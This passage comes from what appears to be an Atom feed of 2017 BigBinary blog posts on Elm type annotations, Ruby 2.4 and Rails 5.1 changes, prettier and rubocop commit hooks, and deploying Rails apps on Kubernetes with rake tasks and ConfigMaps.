timeand we want pattern matching then we should go for <code>type alias</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Arrows in Elm's method signature]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/arrows-in-method-signature-of-elm"/>
      <updated>2017-07-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/arrows-in-method-signature-of-elm</id>
      <content type="html"><![CDATA[<p>Let's look at the documentation of <code>length</code> function of <code>String</code> in Elm.</p><p>It's<a href="http://package.elm-lang.org/packages/elm-lang/core/5.1.1/String#length">here</a>and it looks like this.</p><pre><code class="language-elm">length : String -&gt; Int&gt; String.length &quot;Hello World&quot;11 : Int</code></pre><p>If we look at the similar feature in Ruby world then we get<a href="https://ruby-doc.org/core-2.2.0/String.html#method-i-length">length</a> method.</p><pre><code class="language-ruby">length -&gt; integer</code></pre><p>Method signature in ruby's documentation and Elm's documentation is quitesimilar. Both return an integer.</p><p>In Elm's world method definitions are called &quot;Type Annotations&quot;. Going forwardthat's what I'm going to use in this blog.</p><p>Now let's look at method definition of <code>slice</code> method in Ruby.</p><p>It looks like <a href="https://ruby-doc.org/core-2.2.0/String.html#slice-method">this</a>.</p><pre><code class="language-ruby">slice(start, length) -&gt; new_str or nilirb(main):006:0&gt; &quot;snakes on a plane!&quot;.slice(0,6)=&gt; &quot;snakes&quot;</code></pre><p>In Elm world it looks like<a href="http://package.elm-lang.org/packages/elm-lang/core/5.1.1/String#slice">this</a>.</p><pre><code class="language-ruby">slice : Int -&gt; Int -&gt; String -&gt; String&gt; String.slice  0  6 &quot;snakes on a plane!&quot;&quot;snakes&quot; : String</code></pre><p>Questions is what's up with all those arrows.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 no exception for objects converted to IPAddr]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-ip-addr-methods-do-not-throw-exception-for-objects-that-cant-be-converted-to-ipaddr"/>
      <updated>2017-06-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-ip-addr-methods-do-not-throw-exception-for-objects-that-cant-be-converted-to-ipaddr</id>
      <content type="html"><![CDATA[<p>In Ruby,<a href="https://docs.ruby-lang.org/en/2.4.0/IPAddr.html#method-i-3D-3D"><code>IPAddr#==</code></a>method is used to check whether two IP addresses are equal or not. Ruby also has<a href="https://docs.ruby-lang.org/en/2.4.0/IPAddr.html#method-i-3C-3D-3E"><code>IPAddr#&lt;=&gt;</code></a>method which is used to compare two IP addresses.</p><p>In Ruby 2.3, behavior of these methods was inconsistent. Let's see an example.</p><pre><code class="language-ruby"># Ruby 2.3&gt;&gt; IPAddr.new(&quot;1.2.1.3&quot;) == &quot;Some ip address&quot;=&gt; IPAddr::InvalidAddressError: invalid address</code></pre><p>But if the first argument is invalid IP address and second is valid IP address,then it would return <code>false</code>.</p><pre><code class="language-ruby"># Ruby 2.3&gt;&gt; &quot;Some ip address&quot; == IPAddr.new(&quot;1.2.1.3&quot;)=&gt; false</code></pre><p>The <code>&lt;=&gt;</code> method would raise exception in both the cases.</p><pre><code class="language-ruby"># Ruby 2.3&gt;&gt; &quot;Some ip address&quot; &lt;=&gt; IPAddr.new(&quot;1.2.1.3&quot;)=&gt; IPAddr::InvalidAddressError: invalid address&gt;&gt; IPAddr.new(&quot;1.2.1.3&quot;) &lt;=&gt; &quot;Some ip address&quot;=&gt; IPAddr::InvalidAddressError: invalid address</code></pre><p>In Ruby 2.4, <a href="https://bugs.ruby-lang.org/issues/12799">this issue</a> is<a href="https://github.com/ruby/ruby/pull/1435/files#diff-3504e08cf251c76a597c727011315dd1">fixed</a>for both the methods to return the result without raising exception, if theobjects being compared can't be converted to an IPAddr object.</p><pre><code class="language-ruby"># Ruby 2.4&gt;&gt; IPAddr.new(&quot;1.2.1.3&quot;) == &quot;Some ip address&quot;=&gt; false&gt;&gt; &quot;Some ip address&quot; == IPAddr.new(&quot;1.2.1.3&quot;)=&gt; false&gt;&gt; IPAddr.new(&quot;1.2.1.3&quot;) &lt;=&gt; &quot;Some ip address&quot;=&gt; nil&gt;&gt; &quot;Some ip address&quot; &lt;=&gt; IPAddr.new(&quot;1.2.1.3&quot;)=&gt; nil</code></pre><p>This might cause some backward compatibility if our code is expecting theexception which is no longer raised in Ruby 2.4.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 dropped jQuery dependency in default stack]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-has-dropped-dependency-on-jquery-from-the-default-stack"/>
      <updated>2017-06-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-has-dropped-dependency-on-jquery-from-the-default-stack</id>
      <content type="html"><![CDATA[<p>Rails has been dependent on jQuery for providing the unobtrusive JavaScripthelpers such as<a href="http://guides.rubyonrails.org/working_with_javascript_in_rails.html#unobtrusive-javascript">data-remote, data-url and the Ajax interactions</a>.Every Rails application before Rails 5.1 would have the <code>jquery-rails</code> gemincluded by default.</p><p>The <code>jquery-rails</code> gem contains the jquery-ujs driver which provides all thenice unobtrusive features.</p><p>But now JavaScript has progressed well such that we can write the unobtrusivedriver which Rails needs using just plain vanilla JavaScript.</p><p>That's what has happened for the 5.1 release. The <code>jquery-ujs</code> driver has beenrewritten using just plain JavaScript as part of a GSoC project by<a href="https://github.com/liudangyi">Dangyui Liu</a>.</p><p>Now that the unobtrusive JavaScript driver does not depend on jQuery, new Railsapplications also need not depend on jQuery.</p><p>So, Rails 5.1 has <a href="https://github.com/rails/rails/issues/25208">dropped jQuery</a>as a<a href="https://github.com/rails/rails/pull/27113">dependency from the default stack</a>.</p><p>The current <a href="https://github.com/rails/jquery-rails">jquery-based</a> approach wouldstill be available. It's just that it's not part of the default stack. You willneed to manually add the <code>jquery-rails</code> gem to newly created 5.1 application and<a href="https://github.com/rails/jquery-ujs#installation-using-the-jquery-rails-gem">update the application.js</a>to include the <code>jquery-ujs</code> driver.</p><p>It's worth noting that <code>rails-ujs</code> only supports IE 11+. Visit the<a href="https://basecamp.com/help/3/guides/account/browsers#desktop-browser-support">Desktop Browser Support</a>section of Basecamp to see the full list of all the supported browsers.</p><h4>Browsers support without jQuery</h4><p>We saw some discussion about which all browsers are supported without jQuery. Wedecided to test it ourselves on a plain vanilla CRUD Rails app. We tested&quot;adding&quot;, &quot;editing&quot; and &quot;deleting&quot; of a resource.</p><p><strong>We found that all three operations (adding, editing and deleting) to beworking in following cases.</strong></p><ul><li>Win 7 - IE 9</li><li>Win 7 - IE 10</li><li>Win 7 - IE 11</li><li>Win 8 - IE 10</li><li>Win 8.1 - IE 11</li><li>Win 10 - IE 14 Edge</li><li>Win 10 - IE 15 Edge</li><li>Win 10 - Firefox 53</li><li>Win 10 - Chrome 58</li><li>Win 10 - Safari 5.1</li><li>Mac Sierra - Safari 10.1</li><li>Mac Sierra - Firefox 53</li><li>Mac Sierra - Chrome 58</li></ul><h4>API change for the event handlers</h4><p><code>rails-ujs</code> driver has changed the signature of the event handler functions tojust pass one <code>event</code> object instead of <code>event</code>, <code>data</code>, <code>status</code> and <code>xhr</code> asin the case of <code>jquery-ujs</code> driver.</p><p>Check the<a href="http://edgeguides.rubyonrails.org/working_with_javascript_in_rails.html#rails-ujs-event-handlers">documentation for the rails-ujs event handlers</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 deprecated constants TRUE, FALSE & NIL]]></title>
       <author><name>Akshay Vishnoi</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-has-depecated-constants-true-false-and-nil"/>
      <updated>2017-06-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-has-depecated-constants-true-false-and-nil</id>
      <content type="html"><![CDATA[<p>Ruby has top level constants like <code>TRUE</code>, <code>FALSE</code> and <code>NIL</code>. These constants arejust synonyms for <code>true</code>, <code>false</code> and <code>nil</code> respectively.</p><p>In Ruby 2.4, these constants are<a href="https://bugs.ruby-lang.org/issues/12574">deprecated</a> and will be removed infuture version.</p><pre><code class="language-ruby"># Ruby 2.32.3.1 :001 &gt; TRUE =&gt; true2.3.1 :002 &gt; FALSE =&gt; false2.3.1 :003 &gt; NIL =&gt; nil</code></pre><pre><code class="language-ruby"># Ruby 2.42.4.0 :001 &gt; TRUE(irb):1: warning: constant ::TRUE is deprecated =&gt; true2.4.0 :002 &gt; FALSE(irb):2: warning: constant ::FALSE is deprecated =&gt; false2.4.0 :003 &gt; NIL(irb):3: warning: constant ::NIL is deprecated =&gt; nil</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails using db:migrate & db:seed on Kubernetes]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/managing-rails-tasks-such-as-db-migrate-and-db-seed-on-kuberenetes-while-performing-rolling-deployments"/>
      <updated>2017-06-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/managing-rails-tasks-such-as-db-migrate-and-db-seed-on-kuberenetes-while-performing-rolling-deployments</id>
      <content type="html"><![CDATA[<p>This post assumes that you have basic understanding of<a href="http://kubernetes.io/">Kubernetes</a> terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a> and<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>.</p><h3>Problem</h3><p>We want to deploy a Rails application on Kubernetes. We assume that the<code>assets:precompile</code> task would be run as part of the Docker image build process.</p><p>We want to run rake tasks such as <code>db:migrate</code> and <code>db:seed</code> on the initialdeployment, and just <code>db:migrate</code> task on each later deployment.</p><p>We cannot run these tasks while building the Docker image as it would not beable to connect to the database at that moment.</p><p>So, how to run these tasks?</p><h3>Solution</h3><p>We assume that we have a Docker image named <code>myorg/myapp:v0.0.1</code> which containsthe source code for our Rails application.</p><p>We also assume that we have included <code>database.yml</code> manifest in this Dockerimage with the required configuration needed for connecting to the database.</p><p>We need to create a<a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/">Kubernetes deployment</a>template with the following content.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1kind: Deploymentmetadata:  name: myappspec:  template:    spec:      containers:        - image: myorg/myapp:v0.0.1          name: myapp          imagePullPolicy: IfNotPresent          env:            - name: DB_NAME              value: myapp            - name: DB_USERNAME              value: username            - name: DB_PASSWORD              value: password            - name: DB_HOST              value: 54.10.10.245          ports:            - containerPort: 80      imagePullSecrets:        - name: docker_pull_secret</code></pre><p>Let's save this template file as <code>myapp-deployment.yml</code>.</p><p>We can change the options and environment variables in above template as per ourneed. The environment variables specified here will be available to our Railsapplication.</p><p>To apply above template for the first time on Kubernetes, we will use thefollowing command.</p><pre><code class="language-bash">$ kubectl create -f myapp-deployment.yml</code></pre><p>Later on, to apply the same template after modifications such as change in theDocker image name or change in the environment variables, we will use thefollowing command.</p><pre><code class="language-bash">$ kubectl apply -f myapp-deployment.yml</code></pre><p>After applying the deployment template, it will create a pod for our applicationon Kubernetes.</p><p>To see the pods, we use the following command.</p><pre><code class="language-bash">$ kubectl get pods</code></pre><p>Let's say that our app is now running in the pod named <code>myapp-4007005961-1st7s</code>.</p><p>To execute a rake task, for e.g. <code>db:migrate</code> on this pod, we can run thefollowing command.</p><pre><code class="language-bash">$ kubectl exec myapp-4007005961-1st7s                              \          -- bash -c                                               \          'cd ~/myapp &amp;&amp; RAILS_ENV=production bin/rake db:migrate'</code></pre><p>Similarly, we can execute <code>db:seed</code> rake task as well.</p><p>If we already have an automated flow for deployments on Kubernetes, we can makeuse of this approach to programmatically or conditionally run any rake task asper the needs.</p><h3>Why not to use <a href="https://kubernetes.io/docs/concepts/workloads/controllers/jobs-run-to-completion/">Kubernetes Jobs</a> to solve this?</h3><p>We faced some issues while using Kubernetes Jobs to run migration and seed raketasks.</p><ol><li><p>If the rake task returns a non-zero exit code, the Kubernetes job keepsspawning pods until the task command returns a zero exit code.</p></li><li><p>To get around the issue mentioned above we needed to unnecessarily implementadditional custom logic of checking job status and the status of all thespawned pods.</p></li><li><p>Capturing the command's STDOUT or STDERR was difficult using Kubernetes job.</p></li><li><p>Some housekeeping was needed such as manually terminating the job if itwasn't successful. If not done, it will fail to create a Kubernetes job withthe same name, which is bound to occur when we perform later deployments.</p></li></ol><p>Because of these issues, we choose not to rely on Kubernetes jobs to solve thisproblem.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 allows custom suffix of rotated log files]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-allows-to-customize-suffix-of-the-rotated-log-files"/>
      <updated>2017-06-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-allows-to-customize-suffix-of-the-rotated-log-files</id>
      <content type="html"><![CDATA[<p>In Ruby, The<a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/logger/rdoc/Logger.html#method-c-new">Logger</a>class can be used for rotating log files daily, weekly or monthly.</p><pre><code class="language-ruby">daily_logger = Logger.new('foo.log', 'daily')weekly_logger = Logger.new('foo.log', 'weekly')monthly_logger = Logger.new('foo.log', 'monthly')</code></pre><p>At the end of the specified period, Ruby will change the file extension of thelog file as follows:</p><pre><code class="language-ruby">foo.log.20170615</code></pre><p>The format of the suffix for the rotated log file is <code>%Y%m%d</code>. In Ruby 2.3,there was no way to customize this suffix format.</p><p>Ruby 2.4<a href="https://github.com/ruby/ruby/commit/2c6f15b1ad90af37d7e0eefff7b3f5262e0a4c0b">added the ability</a>to customize the suffix format by passing an extra argument<code>shift_period_suffix</code>.</p><pre><code class="language-ruby"># Ruby 2.4logger = Logger.new('foo.log', 'weekly', shift_period_suffix: '%d-%m-%Y')</code></pre><p>Now, suffix of the rotated log file will use the custom date format which wepassed.</p><pre><code class="language-ruby">foo.log.15-06-2017</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 Hash#transform_values & destructive version]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-added-hash-transform-values-and-its-destructive-version-from-active-support"/>
      <updated>2017-06-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-added-hash-transform-values-and-its-destructive-version-from-active-support</id>
      <content type="html"><![CDATA[<p>It is a common use case to transform the values of a hash.</p><pre><code class="language-ruby">{ a: 1, b: 2, c: 3 } =&gt; { a: 2, b: 4, c: 6 }{ a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } =&gt; { a: &quot;b&quot;, c: &quot;d&quot;, e: &quot;f&quot; }</code></pre><p>We can transform the values of a hash destructively (i.e. modify the originalhash with new values) or non-destructively (i.e. return a new hash instead ofmodifying the original hash).</p><p>Prior to Ruby 2.4, we need to use following code to transform the values of ahash.</p><pre><code class="language-ruby"># Ruby 2.3 Non-destructive version&gt; hash = { a: 1, b: 2, c: 3 } #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}&gt; hash.inject({}) { |h, (k, v)| h[k] = v * 2; h } #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}&gt; hash #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}&gt; hash = { a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}&gt; hash.inject({}) { |h, (k, v)| h[k] = v.downcase; h } #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}&gt; hash #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}</code></pre><pre><code class="language-ruby"># Ruby 2.3 Destructive version&gt; hash = { a: 1, b: 2, c: 3 } #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}&gt; hash.each { |k, v| hash[k] = v * 2 } #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}&gt; hash #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}&gt; hash = { a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}&gt; hash.each { |k, v| hash[k] = v.downcase } #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}&gt; hash #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}</code></pre><h2>transform_values and transform_values! from Active Support</h2><p>Active Support has already implemented handy methods<a href="https://github.com/rails/rails/commit/b2cf8b251aac39c1e3ce71bc1de34a2ce5ef52b1">Hash#transform_values and Hash#transform_values!</a>to transform hash values.</p><p>Now, Ruby 2.4 has also implemented<a href="https://github.com/ruby/ruby/commit/ea5184b939ec3dbdcbd7013da350b8dcb6ca6107">Hash#map_v and Hash#map_v!</a>and then renamed to<a href="https://github.com/ruby/ruby/commit/eaa0a27f6149a9afa2b29729307ff9cc7b0bc95f">Hash#transform_values and Hash#transform_values!</a>for the same purpose.</p><pre><code class="language-ruby"># Ruby 2.4 Non-destructive version&gt; hash = { a: 1, b: 2, c: 3 } #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}&gt; hash.transform_values { |v| v * 2 } #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}&gt; hash #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}&gt; hash = { a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}&gt; hash.transform_values(&amp;:downcase) #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}&gt; hash #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}</code></pre><pre><code class="language-ruby"># Ruby 2.4 Destructive version&gt; hash = { a: 1, b: 2, c: 3 } #=&gt; {:a=&gt;1, :b=&gt;2, :c=&gt;3}&gt; hash.transform_values! { |v| v * 2 } #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}&gt; hash #=&gt; {:a=&gt;2, :b=&gt;4, :c=&gt;6}&gt; hash = { a: &quot;B&quot;, c: &quot;D&quot;, e: &quot;F&quot; } #=&gt; {:a=&gt;&quot;B&quot;, :c=&gt;&quot;D&quot;, :e=&gt;&quot;F&quot;}&gt; hash.transform_values!(&amp;:downcase) #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}&gt; hash #=&gt; {:a=&gt;&quot;b&quot;, :c=&gt;&quot;d&quot;, :e=&gt;&quot;f&quot;}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Prettier & rubocop in Rails to format JS, CSS & Ruby]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/using-prettier-and-rubocop-in-ruby-on-rails-to-format-javascript-css-ruby-files"/>
      <updated>2017-06-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-prettier-and-rubocop-in-ruby-on-rails-to-format-javascript-css-ruby-files</id>
      <content type="html"><![CDATA[<p>Recently we started using <a href="https://github.com/prettier/prettier">prettier</a> and<a href="https://github.com/bbatsov/rubocop">rubocop</a> to automatically format our codeon git commit. Here is how we got started with setting up both <code>prettier</code> and<code>rubocop</code> in our Ruby on Rails applications.</p><h4>Generate package.json</h4><p>If you don't already have a <code>package.json</code> file then execute the followingcommand to create a <code>package.json</code> file with value <code>{}</code>.</p><pre><code class="language-bash">echo &quot;{}&quot; &gt; package.json</code></pre><h4>Install prettier</h4><p>Now execute following command to install prettier.</p><pre><code class="language-bash">npm install --save-dev lint-staged husky prettier# Ignore `node_modules`echo &quot;/node_modules&quot; &gt;&gt; .gitignoreecho &quot;/package-lock.json &gt;&gt; .gitignore</code></pre><h4>Add scripts &amp; ignore node_modules</h4><p>Now open <code>package.json</code> and replace the whole file with following content.</p><pre><code class="language-ruby">{  &quot;scripts&quot;: {    &quot;precommit&quot;: &quot;lint-staged&quot;  },  &quot;lint-staged&quot;: {    &quot;app/**/*.{js,es6,jsx}&quot;: [      &quot;./node_modules/prettier/bin/prettier.js --trailing-comma --single-quote es5 --write&quot;,      &quot;git add&quot;    ]  },  &quot;devDependencies&quot;: {    &quot;husky&quot;: &quot;^0.13.4&quot;,    &quot;lint-staged&quot;: &quot;^3.6.0&quot;,    &quot;prettier&quot;: &quot;^1.4.2&quot;  }}</code></pre><p>Note that if you send pull request with your changes and circleCI or such toolsrun <code>npm install</code> then downgrade <code>husky</code> to <code>^0.13.4</code> and that will solve theproblem.</p><p>In Ruby on Rails applications third party vendor files are stored in <code>vendor</code>folder and we do not want to format JavaScript code in those files. Hence wehave applied the rule to run prettier only on files residing in <code>app</code> directory.</p><p>Here at BigBinary we store all JavaScript files using ES6 features withextension <code>.es6</code>. Hence we are running such files through <code>prettier</code>. Customizethis to match with your application requirements.</p><p>Note that &quot;pre-commit&quot; hook is powered by<a href="https://www.npmjs.com/package/husky">husky</a>. Read up &quot;husky&quot; documentation tolearn about &quot;prepush&quot; hook and other features.</p><h4>Commit the change</h4><pre><code class="language-bash">git add .git commit -m &quot;Added support for prettier for JavaScript files&quot;</code></pre><h3>Execute prettier on current code</h3><pre><code class="language-bash">./node_modules/prettier/bin/prettier.js --single-quote --trailing-comma es5 --write &quot;{app,__{tests,mocks}__}/**/*.{js,es6,jsx,scss,css}&quot;</code></pre><h2>We want more</h2><p>We were thrilled to see prettier format our JavaScript code. We wanted more ofit at more places. We found that prettier can also format CSS files. We changedour code to also format CSS code. It was an easy change. All we had to do waschange one line.</p><p>Before : <code>&quot;app/**/*.{js,es6,jsx}&quot;</code></p><p>After : <code>&quot;app/**/*.{js,es6,jsx,scss,css}&quot;</code></p><h2>Inspired by prettier we welcomed rubocop</h2><p>Now that JavaScript and CSS files are covered we started looking at other placeswhere we can get this productivity gain.</p><p>Since we write a lot of Ruby code we turned our attention to<a href="https://github.com/bbatsov/rubocop">rubocop</a>.</p><p>It turned out that &quot;rubocop&quot; already had a feature to automatically format thecode.</p><p>Open <code>package.json</code> and change <code>lint-staged</code> section to following</p><pre><code class="language-ruby">&quot;app/**/*.{js,es6,jsx,scss,css}&quot;: [  &quot;./node_modules/prettier/bin/prettier.js --single-quote --trailing-comma es5 --write&quot;,  &quot;git add&quot;],&quot;{app,test}/**/*.rb&quot;: [  &quot;bundle exec rubocop -a&quot;,  &quot;git add&quot;]</code></pre><p>Open <code>Gemfile</code> and add following line.</p><pre><code class="language-ruby">group :development do  gem &quot;rubocop&quot;end</code></pre><p>The behavior of <code>rubocop</code> can be controlled by <code>.rubocop.yml</code> file. If you wantto get started with the rubocop file that Rails uses then just execute followingcommand at the root of your Rails application.</p><pre><code class="language-bash">wget https://raw.githubusercontent.com/rails/rails/master/.rubocop.yml</code></pre><p>Open the downloaded file and change the <code>TargetRubyVersion</code> value to match withthe ruby version the project is using. ` value to match with the ruby versionthe project is using.</p><p>Execute rubocop in all ruby files.</p><pre><code class="language-bash">bundle installbundle exec rubocop -a &quot;{app}/**/*.rb&quot;</code></pre><h2>Code is changed on git commit and not on git add</h2><p>We notice that some people were a bit confused when <code>git add</code> did not format thecode.</p><p>Code is formatted when <code>git commit</code> is done.</p><h2>npm install is important</h2><p>It's important to note that users need to do <code>npm install</code> for all this to work.Otherwise <code>prettier</code> or <code>rubocop</code> won't be activated and they will silentlyfail.</p><h2>Full package.json file</h2><p>After all the changes are done then <code>package.json</code> should be like as shownbelow.</p><pre><code class="language-ruby">{  &quot;scripts&quot;: {    &quot;precommit&quot;: &quot;lint-staged&quot;  },  &quot;lint-staged&quot;: {    &quot;app/**/*.{js,es6,jsx,scss,css}&quot;: [      &quot;./node_modules/prettier/bin/prettier.js --trailing-comma es5 --write&quot;,      &quot;git add&quot;    ],    &quot;{app,test}/**/*.rb&quot;: [      &quot;bundle exec rubocop -a&quot;,      &quot;git add&quot;    ]  },  &quot;devDependencies&quot;: {    &quot;husky&quot;: &quot;^0.13.4&quot;,    &quot;lint-staged&quot;: &quot;^3.6.0&quot;,    &quot;prettier&quot;: &quot;^1.4.2&quot;  }}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 adds delegate_missing_to]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-adds-delegate-missing-to"/>
      <updated>2017-05-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-adds-delegate-missing-to</id>
      <content type="html"><![CDATA[<p>When we use <code>method_missing</code> then we should also use<a href="http://blog.marc-andre.ca/2010/11/15/methodmissing-politely/">respond_to_missing?</a>.Because of this code becomes verbose since both <code>method_missing</code> and<code>respond_to_missing?</code> need to move in tandem.</p><p>DHH in <a href="https://github.com/rails/rails/issues/23824">the issue</a> itself provideda good example of this verbosity.</p><pre><code class="language-ruby">class Partition  def initialize(first_event)    @events = [ first_event ]  end  def people    if @events.first.detail.people.any?      @events.collect { |e| Array(e.detail.people) }.flatten.uniq    else      @events.collect(&amp;:creator).uniq    end  end  private    def respond_to_missing?(name, include_private = false)      @events.respond_to?(name, include_private)    end    def method_missing(method, *args, &amp;block)      @events.public_send(method, *args, &amp;block)    endend</code></pre><p>He proposed to use a new method <code>delegate_missing_to</code>. Here is how it can beused.</p><pre><code class="language-ruby">class Partition  delegate_missing_to :@events  def initialize(first_event)    @events = [ first_event ]  end  def people    if @events.first.detail.people.any?      @events.collect { |e| Array(e.detail.people) }.flatten.uniq    else      @events.collect(&amp;:creator).uniq    end  endend</code></pre><h2>Why not SimpleDelegator</h2><p>We at BigBinary have used<a href="https://ruby-doc.org/stdlib-2.2.1/libdoc/delegate/rdoc/SimpleDelegator.html">SimpleDelegator</a>.However one issue with this is that statically we do not know to what object thecalls are getting delegated to since at run time the delegator could beanything.</p><p>DHH had following to<a href="https://github.com/rails/rails/issues/23824#issuecomment-221171899">say</a> aboutthis pattern.</p><blockquote><p>I prefer not having to hijack the inheritance tree for such a simple feature.</p></blockquote><h2>Why not delegate method</h2><p><a href="https://apidock.com/rails/Module/delegate">Delegate</a> method works. However herewe need to white list all the methods and in some cases the list can get reallylong. Following is a real example from a real project.</p><pre><code class="language-ruby">delegate :browser_status, :browser_stats_present?,         :browser_failed_count, :browser_passed_count,         :sequential_id, :project, :initiation_info,         :test_run, success?,         to: :test_run_browser_stats</code></pre><h2>Delegate everything</h2><p>Sometimes we just want to delegate all missing methods. In such cases method<code>delegate_missing_to</code> does the job neatly. Note that the delegation happens toonly <code>public</code> methods of the object being delegated to.</p><p>Check out the <a href="https://github.com/rails/rails/pull/23930">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Kubernetes Configmap with files to deploy Rails apps]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/using-kubernetes-configmap-with-configuration-files-for-deploying-rails-app"/>
      <updated>2017-05-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-kubernetes-configmap-with-configuration-files-for-deploying-rails-app</id>
      <content type="html"><![CDATA[<p>This post assumes that you have basic understanding of<a href="http://kubernetes.io/">Kubernetes</a>terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>and<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>.</p><p>We deploy our Rails applications on Kubernetes and frequently do rolling deployments.</p><p>While performing application deployments on kubernetes cluster, sometimes we need to change the application configuration file.Changing this application configuration file means weneed to change source code, commit the change and then go through the complete deployment process.</p><p>This gets cumbersome for simple changes.</p><p>Let's take the case of wanting to add queue in sidekiq configuration.</p><p>We should be able to change configuration and restart the pod instead of modifying the source-code, creating a new image and then performing a new deployment.</p><p>This is where Kubernetes's <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">ConfigMap</a> comes handy.It allows us to handle configuration files much more efficiently.</p><p>Now we will walk you through the process of managing sidekiq configuration file using configmap.</p><h2>Starting with configmap</h2><p>First we need to create a configmap.We can either create it using <code>kubectl create configmap</code> commandorwe can use a yaml template.</p><p>We will be using yaml template <code>test-configmap.yml</code> which already has sidekiq configuration.</p><pre><code class="language-yaml">apiVersion: v1kind: ConfigMapmetadata:  name: test-staging-sidekiq  labels:    name: test-staging-sidekiq  namespace: testdata:  config: |-    ---    :verbose: true    :environment: staging    :pidfile: tmp/pids/sidekiq.pid    :logfile: log/sidekiq.log    :concurrency: 20    :queues:      - [default, 1]    :dynamic: true    :timeout: 300</code></pre><p>The above template creates configmap in the <code>test</code> namespace and is only accessible in that namespace.</p><p>Let's launch this configmap using following command.</p><pre><code class="language-bash">$ kubectl create -f  test-configmap.ymlconfigmap &quot;test-staging-sidekiq&quot; created</code></pre><p>After that let's use this configmap to create our <code>sidekiq.yml</code> configuration file in deployment template named <code>test-deployment.yml</code>.</p><pre><code class="language-yaml">---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  name: test-staging  labels:    app: test-staging  namespace: testspec:  template:    metadata:      labels:        app: test-staging    spec:      containers:      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest        name: test-staging        imagePullPolicy: Always       env:        - name: REDIS_HOST          value: test-staging-redis        - name: APP_ENV          value: staging        - name: CLIENT          value: test        volumeMounts:            - mountPath: /etc/sidekiq/config              name: test-staging-sidekiq        ports:        - containerPort: 80      volumes:        - name: test-staging-sidekiq          configMap:             name: test-staging-sidekiq             items:              - key: config                path:  sidekiq.yml      